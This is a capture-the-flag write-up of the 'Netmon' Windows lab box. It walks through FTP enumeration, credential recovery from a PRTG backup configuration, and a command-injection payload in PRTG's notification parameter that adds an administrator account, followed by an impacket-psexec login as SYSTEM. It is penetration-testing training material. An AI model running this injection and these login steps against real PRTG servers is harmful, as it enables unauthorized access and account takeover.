Netmon


Contents

Intro


After a growing list of Linux boxes I've done, it's time I pivot to Windows for a bit. Fortunately, this didn't take me too long either!

User


Starting off with nmap:

sudo nmap -sC -sV 10.129.230.176

21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)

80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)

135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

Major ports include 21 and 80 HTTP running PRTG Network Monitor and FTP with anonymous login alongside SMB.

Starting off with the webserver, it's a simple login page. All the redirects on the site went outwards, aside from Forgot password? and Need Help?, but they didn't hold any useful information. I tried using the application's default credentials of prtgadmin:prtgadmin, but it didn't work. I did try scanning for directories with feroxbuster but to no avail.

Next thing I did was FTP onto the machine with anonymous:anonymous. Below are the non-hidden files we have access to from the get-go.

ftp> dir

02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM                 inetpub
07-16-16  09:18AM                 PerfLogs
02-25-19  10:56PM                 Program Files
02-03-19  12:28AM                 Program Files (x86)
02-03-19  08:08AM                 Users
11-10-23  10:20AM                 Windows

We can cd into Users and see that we only have two users in total, which are Public and Administrator. We can find user.txt inside of Public's desktop folder.

ftp> dir

02-03-19  12:18AM                 1195 PRTG Enterprise Console.lnk
02-03-19  12:18AM                 1160 PRTG Network Monitor.lnk
04-19-26  10:54AM                   34 user.txt
226 Transfer complete.
ftp> get user.txt

Following this we can simply cat the user flag.

Root


Warning

I feel like it's important to mention that there are files which we could access from C:/ but they were simply hidden - ProgramData is one of them. They are shown via dir -a.

Given that the webapp itself didn't net much information, we can keep going down the FTP path looking for information there.

A quick google search tells us where the hosted application's files containing data (think app configuration, databases, logs, etc.) are held by default: \ProgramData\Paessler\PRTG Network Monitor. Once we dir inside of the folder, we find 3 configuration files for PRTG - two of which are seemingly normal and one backup file.

ftp> dir
...
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak

The first two config files share their size, but to be sure, after downloading these files to our machine we can md5sum to check each file's MD5 signature:

md5sum *

4d41f8e4e87f0bb48f68adb7bf9e0155  PRTG Configuration.dat
4d41f8e4e87f0bb48f68adb7bf9e0155  PRTG Configuration.old
ae0e820e8c1cdb280fd154bfd15e9519  PRTG Configuration.old.bak

As for what's different between the normal and the backup configuration, anything indicating a password or private key is encrypted in the normal config file:

<privatekey>
              <flags>
                <encrypted/>
              </flags>
</privatekey>

Most things stay the same in the backup configuration as well, aside from <dbpassword>:

<dbpassword>
              <!-- User: prtgadmin -->
              PrTg@dmin2018
            </dbpassword>

Logging in with these credentials doesn't work, but after incrementing the password by 1 as you would with an IDOR, we get a successful login!

This is what PRTG's dashboard looks like. Searching for exploits for the version of PRTG this machine is running (18.1.37.13946), I found a CVE.

Inside of the account's settings there's a notifications tab. When we click on Add new program highlighted by a plus, there will be several options we'll be able to choose from; we will use Execute program>.

The parameter text field is vulnerable to command injection - we can add a user to the host machine with admin privileges, using this command line: Test.txt;net user cat Meow123! /add;net localgroup administrators cat /add

The notification won't trigger by itself though - we'll send a test notification after which our user gets added to the machine.

Following this, I tried logging in with psexec:

impacket-psexec 'cat:[email protected]'
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.129.230.176.....
[*] Found writable share ADMIN$
[*] Uploading file HYzNmXHj.exe
[*] Opening SVCManager on 10.129.230.176.....
[*] Creating service YVIa on 10.129.230.176.....
[*] Starting service YVIa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

We got admin privileges! The flag can be found in Administrator's desktop. Good beginner Windows box, best of luck to anyone else popping this!